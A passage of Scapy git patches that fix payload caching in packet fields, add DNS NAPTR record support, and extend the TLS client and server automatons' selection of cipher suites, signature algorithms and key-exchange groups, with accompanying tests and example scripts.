cls._payload_class: if hasattr(klass, "can_handle") and klass.can_handle(_pkt, _underlayer): return klass - print("DCE/RPC payload class not found or undefined (using Raw)") + log_runtime.warning("DCE/RPC payload class not found or undefined (using Raw)") return Raw @classmethod From a1afb9a42704873767015246522b10ed86ce35b1 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 6 Jun 2024 17:30:38 +0200 Subject: [PATCH 1315/1632] Fix bugs with _raw_packet_cache_field_value in cache of payloads --- scapy/packet.py | 4 ++-- test/fields.uts | 47 +++++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 49 insertions(+), 2 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 2a1c949a9f4..6b813986f3d 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -664,10 +664,10 @@ def _raw_packet_cache_field_value(self, fld, val, copy=False): # avoid copying whole packets (perf: #GH3894) if fld.islist: return [ - _cpy(x.fields) for x in val + (_cpy(x.fields), x.payload.raw_packet_cache) for x in val ] else: - return _cpy(val.fields) + return (_cpy(val.fields), val.payload.raw_packet_cache) elif fld.islist or fld.ismutable: return _cpy(val) return None diff --git a/test/fields.uts b/test/fields.uts index 2262ec32d6f..81b2566683c 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -863,6 +863,53 @@ while p.pl: assert i == 100 += Test cache handling of payload modification in a PacketListField +~ field + +# GH4414 +class SubPacket(Packet): + fields_desc = [ + ByteField("b", 0), + ] + +class MyPacket(Packet): + fields_desc = [ + PacketListField("a", [], SubPacket), + ] + + +p = MyPacket(b"\x00extrapayload") +p.a[0] = SubPacket(b=0) / b"test" + +assert bytes(p) == b"\x00test" + += Test cache handling of payload modification in a PacketField +~ field + +# also GH4414 +class PayloadPacket(Packet): + fields_desc = [ + StrField("b", ""), + ] + +class SubPacket(Packet): + fields_desc = [] + +bind_layers(SubPacket, PayloadPacket) + +class MyPacket(Packet): + fields_desc = [ + PacketField("a", None, SubPacket), + ] + + +s = b'test' +p = MyPacket(s) + +p[PayloadPacket].b = b'new' +assert p.build() != s + + ############ ############ + Tests on MultiFlagsField From 3333075736f02f117c78b1175e0fde4cba75f5b0 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Thu, 11 Jul 2024 11:20:35 +0300 Subject: [PATCH 1316/1632] [DNS] add NAPTR RRs (#4456) * An NAPTR format has been added * tests: cover NAPTR RRs * dns: refine NAPTR RRs by making it consistent with the other RRs and fixing a bug where the lengths of "flags", "services" and "regexp" weren't computed correctly when they were instantiated because their default lengths were 0 instead of None. --------- Co-authored-by: Ivan Stepanenko --- scapy/layers/dns.py | 22 ++++++++++++++++++++++ test/scapy/layers/dns.uts | 11 +++++++++++ 2 files changed, 33 insertions(+) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index eb3301876e5..2da34cebce3 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -1111,11 +1111,33 @@ class DNSRRTSIG(_DNSRRdummy): ] +class DNSRRNAPTR(_DNSRRdummy): + name = "DNS NAPTR Resource Record" + fields_desc = [DNSStrField("rrname", ""), + ShortEnumField("type", 35, dnstypes), + BitField("cacheflush", 0, 1), # mDNS RFC 6762 + BitEnumField("rclass", 1, 15, dnsclasses), + IntField("ttl", 0), + ShortField("rdlen", None), + ShortField("order", 0), + ShortField("preference", 0), + FieldLenField("flags_len", None, fmt="!B", length_of="flags"), + StrLenField("flags", "", length_from=lambda pkt: pkt.flags_len), + FieldLenField("services_len", None, fmt="!B", length_of="services"), + StrLenField("services", "", + length_from=lambda pkt: pkt.services_len), + FieldLenField("regexp_len", None, fmt="!B", length_of="regexp"), + StrLenField("regexp", "", length_from=lambda pkt: pkt.regexp_len), + DNSStrField("replacement", ""), + ] + + DNSRR_DISPATCHER = { 6: DNSRRSOA, # RFC 1035 13: DNSRRHINFO, # RFC 1035 15: DNSRRMX, # RFC 1035 33: DNSRRSRV, # RFC 2782 + 35: DNSRRNAPTR, # RFC 2915 41: DNSRROPT, # RFC 1671 43: DNSRRDS, # RFC 4034 46: DNSRRRSIG, # RFC 4034 diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index e2912ac4943..3abe180e34d 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -273,6 +273,17 @@ assert DNSRR(raw(rr)).rdata == [] rr = DNSRR(rrname='scapy', type='TXT', rdata=[]) assert raw(rr) == b += DNS record type 35 (NAPTR) + +b = b'\x00\x00#\x00\x01\x00\x00\x00\x00\x00+\x00\n\x00d\x01u\x07E2U+sip\x1b!^.*$!sip:info@example.com!\x00' + +p = DNSRRNAPTR(b) +assert p.order == 10 and p.preference == 100 and p.flags == b'u' and p.services == b'E2U+sip' +assert p.regexp == b'!^.*$!sip:info@example.com!' and p.replacement == b'.' + +p = DNSRRNAPTR(order=10, preference=100, flags="u", services="E2U+sip", regexp="!^.*$!sip:info@example.com!") +assert raw(p) == b + = DNS record type 39 (DNAME) b = b'\x05local\x00\x00\x27\x00\x01\x00\x00\x00\x00\x00\x07\x05local\x00' From 6b26e2106c251d50380c299248930930f04af2f3 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 12 Jul 2024 13:02:03 +0200 Subject: [PATCH 1317/1632] Improve chosing of TLS signature and curve in Automatons (#4449) --- scapy/layers/tls/automaton_cli.py | 68 ++++++++---- scapy/layers/tls/automaton_srv.py | 121 ++++++++++++++++++---- scapy/layers/tls/handshake.py | 7 ++ scapy/layers/tls/handshake_sslv2.py | 2 +- scapy/layers/tls/keyexchange.py | 58 +++++++---- scapy/layers/tls/keyexchange_tls13.py | 72 +++++++++++++ scapy/layers/tls/session.py | 6 ++ test/scapy/layers/tls/example_client.py | 10 ++ test/scapy/layers/tls/example_server.py | 8 +- test/scapy/layers/tls/tlsclientserver.uts | 9 +- 10 files changed, 297 insertions(+), 64 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index e0f23763063..6053c211199 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -80,6 +80,11 @@ from scapy.packet import Raw from scapy.compat import bytes_encode +# Typing imports +from typing import ( + Optional, +) + class TLSClientAutomaton(_TLSAutomaton): """ @@ -95,12 +100,16 @@ class TLSClientAutomaton(_TLSAutomaton): :param mycert: :param mykey: may be provided as filenames. They will be used in the (or post) handshake, should the server ask for client authentication. - :param client_hello: may hold a TLSClientHello or SSLv2ClientHello to be - sent to the server. This is particularly useful for extensions - tweaking. If not set, a default is populated accordingly. + :param client_hello: may hold a TLSClientHello, TLS13ClientHello or + SSLv2ClientHello to be sent to the server. This is particularly useful + for extensions tweaking. If not set, a default is populated accordingly. :param version: is a quicker way to advertise a protocol version ("sslv2", - "tls1", "tls12", etc.) It may be overridden by the previous + "tls1", "tls12", "tls13", etc.) It may be overridden by the previous 'client_hello'. + :param session_ticket_file_in: path to a file that contains a session ticket + acquired in a previous session. + :param session_ticket_file_out: path to store any session ticket acquired during + this session. :param data: is a list of raw data to be sent to the server once the handshake has been completed. Both 'stop_server' and 'quit' will work this way. @@ -114,9 +123,10 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, session_ticket_file_out=None, psk=None, psk_mode=None, data=None, - ciphersuite=None, - curve=None, + ciphersuite: Optional[int] = None, + curve: Optional[str] = None, supported_groups=None, + supported_signature_algorithms=None, **kargs): super(TLSClientAutomaton, self).parse_args(mycert=mycert, @@ -157,16 +167,29 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, if supported_groups is None: supported_groups = ["secp256r1", "secp384r1", "x448"] if conf.crypto_valid_advanced: - supported_groups.append("x25519") + supported_groups.extend([ + "x25519", + "ffdhe2048", + ]) self.supported_groups = supported_groups + if supported_signature_algorithms is None: + supported_signature_algorithms = [ + "sha256+rsa", + ] + supported_signature_algorithms.insert(0, "sha256+rsaepss") + self.supported_signature_algorithms = supported_signature_algorithms + self.curve = None + self.ciphersuite = None + + if ciphersuite is not None: + if ciphersuite in _tls_cipher_suites.keys(): + self.ciphersuite = ciphersuite + else: + self.vprint("Unrecognized cipher suite.") + if self.advertised_tls_version == 0x0304: - self.ciphersuite = 0x1301 - if ciphersuite is not None: - cs = int(ciphersuite, 16) - if cs in _tls_cipher_suites.keys(): - self.ciphersuite = cs if conf.crypto_valid_advanced: # Default to x25519 if supported self.curve = 29 @@ -192,14 +215,16 @@ def vprint_sessioninfo(self): if self.verbose: s = self.cur_session v = _tls_version[s.tls_version] - self.vprint("Version : %s" % v) + self.vprint("Version : %s" % v) cs = s.wcs.ciphersuite.name - self.vprint("Cipher suite : %s" % cs) + self.vprint("Cipher suite : %s" % cs) + kx_groupname = s.kx_group + self.vprint("Server temp key : %s" % kx_groupname) if s.tls_version >= 0x0304: ms = s.tls13_master_secret else: ms = s.master_secret - self.vprint("Master secret : %s" % repr_hex(ms)) + self.vprint("Master secret : %s" % repr_hex(ms)) if s.server_certs: self.vprint("Server certificate chain: %r" % s.server_certs) if s.tls_version >= 0x0304: @@ -306,11 +331,13 @@ def should_add_ClientHello(self): if self.client_hello: p = self.client_hello else: - p = TLSClientHello() + p = TLSClientHello(ciphers=self.ciphersuite) ext = [] # Add TLS_Ext_SignatureAlgorithms for TLS 1.2 ClientHello if self.cur_session.advertised_tls_version == 0x0303: - ext += [TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsa"])] + ext += [TLS_Ext_SignatureAlgorithms( + sig_algs=self.supported_signature_algorithms, + )] # Add TLS_Ext_ServerName if self.server_name: ext += TLS_Ext_ServerName( @@ -1147,8 +1174,9 @@ def tls13_should_add_ClientHello(self): ext += TLS_Ext_KeyShare_CH( client_shares=[KeyShareEntry(group=self.curve)] ) - ext += TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsaepss", - "sha256+rsa"]) + ext += TLS_Ext_SignatureAlgorithms( + sig_algs=self.supported_signature_algorithms, + ) p.ext = ext self.add_msg(p) raise self.TLS13_ADDED_CLIENTHELLO() @@ -1215,7 +1243,7 @@ def TLS13_HANDLED_ALERT_FROM_SERVERFLIGHT1(self): self.vprint(self.cur_pkt.mysummary()) raise self.CLOSE_NOTIFY() - @ATMT.condition(TLS13_RECEIVED_SERVERFLIGHT1, prio=4) + @ATMT.condition(TLS13_RECEIVED_SERVERFLIGHT1, prio=5) def tls13_missing_ServerHello(self): raise self.MISSING_SERVERHELLO() diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 946c93f4776..f586d78e872 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -34,13 +34,24 @@ from scapy.layers.tls.basefields import _tls_version from scapy.layers.tls.session import tlsSession from scapy.layers.tls.crypto.groups import _tls_named_groups -from scapy.layers.tls.extensions import TLS_Ext_SupportedVersion_SH, \ - TLS_Ext_SupportedGroups, TLS_Ext_Cookie, \ - TLS_Ext_SignatureAlgorithms, TLS_Ext_PSKKeyExchangeModes, \ - TLS_Ext_EarlyDataIndicationTicket -from scapy.layers.tls.keyexchange_tls13 import TLS_Ext_KeyShare_SH, \ - KeyShareEntry, TLS_Ext_KeyShare_HRR, TLS_Ext_PreSharedKey_CH, \ - TLS_Ext_PreSharedKey_SH +from scapy.layers.tls.extensions import ( + TLS_Ext_Cookie, + TLS_Ext_EarlyDataIndicationTicket, + TLS_Ext_PSKKeyExchangeModes, + TLS_Ext_RenegotiationInfo, + TLS_Ext_SignatureAlgorithms, + TLS_Ext_SupportedGroups, + TLS_Ext_SupportedVersion_SH, +) +from scapy.layers.tls.keyexchange import _tls_hash_sig +from scapy.layers.tls.keyexchange_tls13 import ( + TLS_Ext_KeyShare_SH, + KeyShareEntry, + TLS_Ext_KeyShare_HRR, + TLS_Ext_PreSharedKey_CH, + TLS_Ext_PreSharedKey_SH, + get_usable_tls13_sigalgs, +) from scapy.layers.tls.handshake import TLSCertificate, TLSCertificateRequest, \ TLSCertificateVerify, TLSClientHello, TLSClientKeyExchange, TLSFinished, \ TLSServerHello, TLSServerHelloDone, TLSServerKeyExchange, \ @@ -55,8 +66,17 @@ TLSApplicationData from scapy.layers.tls.record_tls13 import TLS13 from scapy.layers.tls.crypto.hkdf import TLS13_HKDF -from scapy.layers.tls.crypto.suites import _tls_cipher_suites_cls, \ - get_usable_ciphersuites +from scapy.layers.tls.crypto.suites import ( + _tls_cipher_suites_cls, + _tls_cipher_suites, + get_usable_ciphersuites, +) + +# Typing imports +from typing import ( + Optional, + Union, +) if conf.crypto_valid: from cryptography.hazmat.backends import default_backend @@ -89,7 +109,8 @@ class TLSServerAutomaton(_TLSAutomaton): def parse_args(self, server="127.0.0.1", sport=4433, mycert=None, mykey=None, - preferred_ciphersuite=None, + preferred_ciphersuite: Optional[int] = None, + preferred_signature_algorithm: Union[str, int, None] = None, client_auth=False, is_echo_server=True, max_client_idle_time=60, @@ -120,36 +141,65 @@ def parse_args(self, server="127.0.0.1", sport=4433, self.remote_ip = None self.remote_port = None - self.preferred_ciphersuite = preferred_ciphersuite self.client_auth = client_auth self.is_echo_server = is_echo_server self.max_client_idle_time = max_client_idle_time self.curve = None + self.preferred_ciphersuite = None + self.preferred_signature_algorithm = None self.cookie = cookie self.psk_secret = psk self.psk_mode = psk_mode + if handle_session_ticket is None: handle_session_ticket = session_ticket_file is not None if handle_session_ticket: session_ticket_file = session_ticket_file or get_temp_file() self.handle_session_ticket = handle_session_ticket self.session_ticket_file = session_ticket_file - for (group_id, ng) in _tls_named_groups.items(): - if ng == curve: - self.curve = group_id + + if preferred_ciphersuite is not None: + if preferred_ciphersuite in _tls_cipher_suites: + self.preferred_ciphersuite = preferred_ciphersuite + else: + self.vprint("Unrecognized cipher suite.") + + if preferred_signature_algorithm is not None: + if preferred_signature_algorithm in _tls_hash_sig: + self.preferred_signature_algorithm = preferred_signature_algorithm + else: + for (sig_id, nc) in _tls_hash_sig.items(): + if nc == preferred_signature_algorithm: + self.preferred_signature_algorithm = sig_id + break + else: + self.vprint("Unrecognized signature algorithm.") + + if curve: + for (group_id, ng) in _tls_named_groups.items(): + if ng == curve: + self.curve = group_id + break + else: + self.vprint("Unrecognized curve.") def vprint_sessioninfo(self): if self.verbose: s = self.cur_session v = _tls_version[s.tls_version] - self.vprint("Version : %s" % v) + self.vprint("Version : %s" % v) cs = s.wcs.ciphersuite.name - self.vprint("Cipher suite : %s" % cs) + self.vprint("Cipher suite : %s" % cs) + kx_groupname = s.kx_group + self.vprint("Server temp key : %s" % kx_groupname) + if s.tls_version >= 0x0304: + sigalg = _tls_hash_sig[s.selected_sig_alg] + self.vprint("Negotiated sig_alg : %s" % sigalg) if s.tls_version < 0x0304: ms = s.master_secret else: ms = s.tls13_master_secret - self.vprint("Master secret : %s" % repr_hex(ms)) + self.vprint("Master secret : %s" % repr_hex(ms)) if s.client_certs: self.vprint("Client certificate chain: %r" % s.client_certs) @@ -273,6 +323,13 @@ def should_handle_ClientHello(self): self.raise_on_packet(TLSClientHello, self.HANDLED_CLIENTHELLO) + @ATMT.condition(RECEIVED_CLIENTFLIGHT1, prio=3) + def tls13_should_handle_ChangeCipherSpec_after_tls13_retry(self): + # Middlebox compatibility mode after a HelloRetryRequest. + if self.cur_session.tls13_retry: + self.raise_on_packet(TLSChangeCipherSpec, + self.RECEIVED_CLIENTFLIGHT1) + @ATMT.state() def HANDLED_CLIENTHELLO(self): """ @@ -309,8 +366,6 @@ def should_add_ServerHello(self): """ Selecting a cipher suite should be no trouble as we already caught the None case previously. - - Also, we do not manage extensions at all. """ if isinstance(self.mykey, PrivKeyRSA): kx = "RSA" @@ -320,7 +375,11 @@ def should_add_ServerHello(self): c = usable_suites[0] if self.preferred_ciphersuite in usable_suites: c = self.preferred_ciphersuite - self.add_msg(TLSServerHello(cipher=c)) + + # Some extensions + ext = [TLS_Ext_RenegotiationInfo()] + + self.add_msg(TLSServerHello(cipher=c, ext=ext)) raise self.ADDED_SERVERHELLO() @ATMT.state() @@ -568,6 +627,12 @@ def tls13_HANDLED_CLIENTHELLO(self): if self.curve in e.groups: # Here, we need to send an HelloRetryRequest raise self.tls13_PREPARE_HELLORETRYREQUEST() + + # Signature Algorithms extension is mandatory + if not s.advertised_sig_algs: + self.vprint("Missing signature_algorithms extension in ClientHello!") + raise self.CLOSE_NOTIFY() + raise self.tls13_PREPARE_SERVERFLIGHT1() @ATMT.state() @@ -818,6 +883,22 @@ def tls13_ADDED_CERTIFICATE(self): @ATMT.condition(tls13_ADDED_CERTIFICATE) def tls13_should_add_CertificateVerifiy(self): if not self.cur_session.tls13_psk_secret: + # If we have a preferred signature algorithm, and the client supports + # it, use that. + if self.cur_session.advertised_sig_algs: + usable_sigalgs = get_usable_tls13_sigalgs( + self.cur_session.advertised_sig_algs, + self.mykey, + location="certificateverify", + ) + if not usable_sigalgs: + self.vprint("No usable signature algorithm!") + raise self.CLOSE_NOTIFY() + pref_alg = self.preferred_signature_algorithm + if pref_alg in usable_sigalgs: + self.cur_session.selected_sig_alg = pref_alg + else: + self.cur_session.selected_sig_alg = usable_sigalgs[0] self.add_msg(TLSCertificateVerify()) raise self.tls13_ADDED_CERTIFICATEVERIFY() diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index f2073a9c6bb..3f5154ecc15 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -527,6 +527,11 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return TLS13ServerHello return TLSServerHello + def build(self, *args, **kargs): + if self.getfieldval("sid") == b"" and self.tls_session: + self.sid = self.tls_session.sid + return super(TLSServerHello, self).build(*args, **kargs) + def post_build(self, p, pay): if self.random_bytes is None: p = p[:10] + randstring(28) + p[10 + 28:] @@ -707,6 +712,8 @@ def build(self): fval = self.getfieldval("random_bytes") if fval is None: self.random_bytes = _tls_hello_retry_magic + if self.getfieldval("sid") == b"" and self.tls_session: + self.sid = self.tls_session.sid return _TLSHandshake.build(self) def tls_session_update(self, msg_str): diff --git a/scapy/layers/tls/handshake_sslv2.py b/scapy/layers/tls/handshake_sslv2.py index 78885d2b953..1917cdf523e 100644 --- a/scapy/layers/tls/handshake_sslv2.py +++ b/scapy/layers/tls/handshake_sslv2.py @@ -528,7 +528,7 @@ class SSLv2ServerFinished(_SSLv2Handshake): def build(self, *args, **kargs): fval = self.getfieldval("sid") - if fval == b"": + if fval == b"" and self.tls_session: self.sid = self.tls_session.sid return super(SSLv2ServerFinished, self).build(*args, **kargs) diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index cd81a20adaf..04da164d785 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -160,11 +160,9 @@ class _TLSSignature(_GenericTLSSessionInheritance): but if it is provided a TLS context with a tls_version < 0x0303 at initialization, it will fall back to the implicit signature. Even more, the 'sig_len' field won't be used with SSLv2. - - #XXX 'sig_alg' should be set in __init__ depending on the context. """ name = "TLS Digital Signature" - fields_desc = [SigAndHashAlgField("sig_alg", 0x0804, _tls_hash_sig), + fields_desc = [SigAndHashAlgField("sig_alg", None, _tls_hash_sig), SigLenField("sig_len", None, fmt="!H", length_of="sig_val"), SigValField("sig_val", None, @@ -172,14 +170,23 @@ class _TLSSignature(_GenericTLSSessionInheritance): def __init__(self, *args, **kargs): super(_TLSSignature, self).__init__(*args, **kargs) - if (self.tls_session and - self.tls_session.tls_version): - if self.tls_session.tls_version < 0x0303: - self.sig_alg = None - elif self.tls_session.tls_version == 0x0304: - # For TLS 1.3 signatures, set the signature - # algorithm to RSA-PSS - self.sig_alg = 0x0804 + if "sig_alg" not in kargs: + # Default sig_alg + self.sig_alg = 0x0804 + if self.tls_session and self.tls_session.tls_version: + s = self.tls_session + if s.selected_sig_alg: + self.sig_alg = s.selected_sig_alg + elif s.tls_version < 0x0303: + self.sig_alg = None + elif s.tls_version == 0x0304: + # For TLS 1.3 signatures, set the signature + # algorithm to RSA-PSS + self.sig_alg = 0x0804 + + def post_dissection(self, r): + # for client + self.tls_session.selected_sig_alg = self.sig_alg def _update_sig(self, m, key): """ @@ -193,11 +200,14 @@ def _update_sig(self, m, key): else: self.sig_val = key.sign(m, t='pkcs', h='md5') else: - h, sig = _tls_hash_sig[self.sig_alg].split('+') - if sig.endswith('pss'): - t = "pss" + if self.sig_alg in [0x0807, 0x0808]: # ed25519, ed448 + h, t = _tls_hash_sig[self.sig_alg], None else: - t = "pkcs" + h, sig = _tls_hash_sig[self.sig_alg].split('+') + if sig.endswith('pss'): + t = "pss" + else: + t = "pkcs" self.sig_val = key.sign(m, t=t, h=h) def _verify_sig(self, m, cert): @@ -207,11 +217,14 @@ def _verify_sig(self, m, cert): """ if self.sig_val: if self.sig_alg: - h, sig = _tls_hash_sig[self.sig_alg].split('+') - if sig.endswith('pss'): - t = "pss" + if self.sig_alg in [0x0807, 0x0808]: # ed25519, ed448 + h, t = _tls_hash_sig[self.sig_alg], None else: - t = "pkcs" + h, sig = _tls_hash_sig[self.sig_alg].split('+') + if sig.endswith('pss'): + t = "pss" + else: + t = "pkcs" return cert.verify(m, self.sig_val, t=t, h=h) else: if self.tls_session.tls_version >= 0x0300: @@ -338,6 +351,7 @@ def fill_missing(self): self.dh_p = pkcs_i2osp(default_params.p, default_mLen // 8) if self.dh_plen is None: self.dh_plen = len(self.dh_p) + s.kx_group = "ffdhe%s" % (self.dh_plen * 8) if not self.dh_g: self.dh_g = pkcs_i2osp(default_params.g, 1) @@ -374,6 +388,7 @@ def register_pubkey(self): s = self.tls_session s.server_kx_pubkey = public_numbers.public_key(default_backend()) + s.kx_group = "ffdhe%s" % (self.dh_plen * 8) if not s.client_kx_ffdh_params: s.client_kx_ffdh_params = pn.parameters(default_backend()) @@ -584,6 +599,7 @@ def fill_missing(self): # this fallback is arguable curve_group = 23 # default to secp256r1 s.server_kx_privkey = _tls_named_groups_generate(curve_group) + s.kx_group = _tls_named_curves.get(curve_group, str(curve_group)) if self.point is None: self.point = _tls_named_groups_pubbytes( @@ -612,6 +628,7 @@ def register_pubkey(self): self.named_curve, self.point ) + s.kx_group = _tls_named_curves.get(self.named_curve, str(self.named_curve)) if not s.client_kx_ecdh_params: s.client_kx_ecdh_params = self.named_curve @@ -668,6 +685,8 @@ def fill_missing(self): if self.rsamodlen is None: self.rsamodlen = len(self.rsamod) + self.tls_session.kx_group = "rsa%s" % self.rsamodlen + rsaexplen = math.ceil(math.log(pubNum.e) / math.log(2) / 8.) if not self.rsaexp: self.rsaexp = pkcs_i2osp(pubNum.e, rsaexplen) @@ -680,6 +699,7 @@ def register_pubkey(self): m = self.rsamod e = self.rsaexp self.tls_session.server_tmp_rsa_key = PubKeyRSA((e, m, mLen)) + self.tls_session.kx_group = "rsa%s" % mLen def post_dissection(self, pkt): try: diff --git a/scapy/layers/tls/keyexchange_tls13.py b/scapy/layers/tls/keyexchange_tls13.py index 878e88b3fc6..87649e12c22 100644 --- a/scapy/layers/tls/keyexchange_tls13.py +++ b/scapy/layers/tls/keyexchange_tls13.py @@ -26,6 +26,7 @@ ) from scapy.packet import Packet from scapy.layers.tls.extensions import TLS_Ext_Unknown, _tls_ext +from scapy.layers.tls.cert import PrivKeyECDSA, PrivKeyRSA from scapy.layers.tls.crypto.groups import ( _tls_named_curves, _tls_named_ffdh_groups, @@ -37,6 +38,9 @@ if conf.crypto_valid: from cryptography.hazmat.primitives.asymmetric import ec +if conf.crypto_valid_advanced: + from cryptography.hazmat.primitives.asymmetric import x25519 + from cryptography.hazmat.primitives.asymmetric import x448 class KeyShareEntry(Packet): @@ -176,6 +180,7 @@ def post_build(self, pkt, pay): else: pms = privkey.exchange(ec.ECDH(), pubkey) self.tls_session.tls13_dhe_secret = pms + self.tls_session.kx_group = group_name return super(TLS_Ext_KeyShare_SH, self).post_build(pkt, pay) def post_dissection(self, r): @@ -199,6 +204,7 @@ def post_dissection(self, r): else: pms = privkey.exchange(ec.ECDH(), pubkey) self.tls_session.tls13_dhe_secret = pms + self.tls_session.kx_group = group_name elif group_name in self.tls_session.tls13_server_privshare: pubkey = self.tls_session.tls13_client_pubshares[group_name] privkey = self.tls_session.tls13_server_privshare[group_name] @@ -210,6 +216,7 @@ def post_dissection(self, r): else: pms = privkey.exchange(ec.ECDH(), pubkey) self.tls_session.tls13_dhe_secret = pms + self.tls_session.kx_group = group_name return super(TLS_Ext_KeyShare_SH, self).post_dissection(r) @@ -284,3 +291,68 @@ class TLS_Ext_PreSharedKey_SH(TLS_Ext_Unknown): _tls_ext_presharedkey_cls = {1: TLS_Ext_PreSharedKey_CH, 2: TLS_Ext_PreSharedKey_SH} + + +# Util to find usable signature algorithms + +# TLS 1.3 SignatureScheme is a subset of _tls_hash_sig +_tls13_usable_certificate_verify_algs = [ + # ECDSA algorithms + 0x0403, 0x0503, 0x0603, + # RSASSA-PSS algorithms with public key OID rsaEncryption + 0x0804, 0x0805, 0x0806, + # EdDSA algorithms + 0x0807, 0x0808, +] + +_tls13_usable_certificate_signature_algs = [ + # RSASSA-PKCS1-v1_5 algorithms + 0x0401, 0x0501, 0x0601, + # ECDSA algorithms + 0x0403, 0x0503, 0x0603, + # EdDSA algorithms + 0x0807, 0x0808, + # RSASSA-PSS algorithms with public key OID RSASSA-PSS + 0x0809, 0x080a, 0x080b, + # Legacy algorithms + 0x0201, 0x0203, +] + + +def get_usable_tls13_sigalgs(li, key, location="certificateverify"): + """ + From a list of proposed signature algorithms, this function returns a list of + usable signature algorithms. + The order of the signature algorithms in the list returned by the + function matches the one of the proposal. + """ + from scapy.layers.tls.keyexchange import _tls_hash_sig + res = [] + if isinstance(key, PrivKeyRSA): + kxs = ["rsa"] + elif isinstance(key, PrivKeyECDSA): + kxs = [] + if isinstance(key.key, x25519.X25519PrivateKey): + kxs.append("ed25519") + elif isinstance(key.key, x448.X448PrivateKey): + kxs.append("edx448") + else: + kxs = ["ecdsa"] + else: + return res + if location == "certificateverify": + algs = _tls13_usable_certificate_verify_algs + elif location == "certificatesignature": + algs = _tls13_usable_certificate_signature_algs + else: + return res + for c in li: + if c in algs: + sigalg = _tls_hash_sig[c] + if "+" in sigalg: + _, sig = sigalg.split('+') + else: + sig = sigalg + if any(kx in sig for kx in kxs): + res.append(c) + return res diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index d8dd7f81220..9855b0cd411 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -441,6 +441,9 @@ def __init__(self, # Ephemeral key exchange parameters + # The agreed-upon ephemeral key group + self.kx_group = None + # These are the group/curve parameters, needed to hold the information # e.g. from receiving an SKE to sending a CKE. Usually, only one of # these attributes will be different from None. @@ -483,6 +486,9 @@ def __init__(self, self.pre_master_secret = None self.master_secret = None + # The advertised supported signature algorithms found in the ClientHello + # extension. (for TLS 1.2-TLS 1.3 only) + self.advertised_sig_algs = [] # The agreed-upon signature algorithm (for TLS 1.2-TLS 1.3 only) self.selected_sig_alg = None diff --git a/test/scapy/layers/tls/example_client.py b/test/scapy/layers/tls/example_client.py index bbe50a27222..9a28f5cc4f0 100644 --- a/test/scapy/layers/tls/example_client.py +++ b/test/scapy/layers/tls/example_client.py @@ -18,6 +18,7 @@ from scapy.utils import inet_aton from scapy.layers.tls.automaton_cli import TLSClientAutomaton from scapy.layers.tls.basefields import _tls_version_options +from scapy.layers.tls.keyexchange import _tls_hash_sig from scapy.layers.tls.handshake import TLSClientHello, TLS13ClientHello from scapy.tools.UTscapy import scapy_path @@ -38,6 +39,7 @@ parser.add_argument("--sni", help="Server Name Indication") parser.add_argument("--curve", help="ECC group to advertise") +parser.add_argument("--sig-algs", help="Signature algorithms to advertise (coma separated)") parser.add_argument("--debug", action="store_const", const=5, default=0, help="Enter debug mode") parser.add_argument("server", nargs="?", default="127.0.0.1", @@ -79,6 +81,13 @@ except socket.error: server_name = args.server +supported_signature_algorithms = None +if args.sig_algs: + supported_signature_algorithms = args.sig_algs.split(",") + for sigalg in supported_signature_algorithms: + if sigalg not in _tls_hash_sig.values(): + sys.exit("Unrecognized signature algorithm: %s" % sigalg) + t = TLSClientAutomaton(server=args.server, dport=args.port, server_name=server_name, client_hello=ch, @@ -90,6 +99,7 @@ resumption_master_secret=args.res_master, session_ticket_file_in=args.session_ticket_file_in, session_ticket_file_out=args.session_ticket_file_out, + supported_signature_algorithms=supported_signature_algorithms, curve=args.curve, debug=args.debug) t.run() diff --git a/test/scapy/layers/tls/example_server.py b/test/scapy/layers/tls/example_server.py index 9c4b40fc6f0..f307abf095b 100644 --- a/test/scapy/layers/tls/example_server.py +++ b/test/scapy/layers/tls/example_server.py @@ -25,6 +25,10 @@ help="External PSK for symmetric authentication (for TLS 1.3)") # noqa: E501 parser.add_argument("--no_pfs", action="store_true", help="Disable (EC)DHE exchange with PFS") +parser.add_argument("--pcs", + help="Preferred Cipher Suite (ex: 0x1301 = TLS_AES_128_GCM_SHA256)") +parser.add_argument("--psa", + help="Preferred Signature Algorithm (ex: sha256+rsaepss)") # args.curve must be a value in the dict _tls_named_curves (see tls/crypto/groups.py) parser.add_argument("--curve", help="ECC curve to advertise (ex: secp256r1...") parser.add_argument("--cookie", action="store_true", @@ -39,7 +43,6 @@ help="Enter debug mode") args = parser.parse_args() -pcs = None # PFS is set by default... if args.no_pfs and args.psk: psk_mode = "psk_ke" @@ -48,7 +51,8 @@ t = TLSServerAutomaton(mycert=scapy_path('/test/scapy/layers/tls/pki/srv_cert.pem'), mykey=scapy_path('/test/scapy/layers/tls/pki/srv_key.pem'), - preferred_ciphersuite=pcs, + 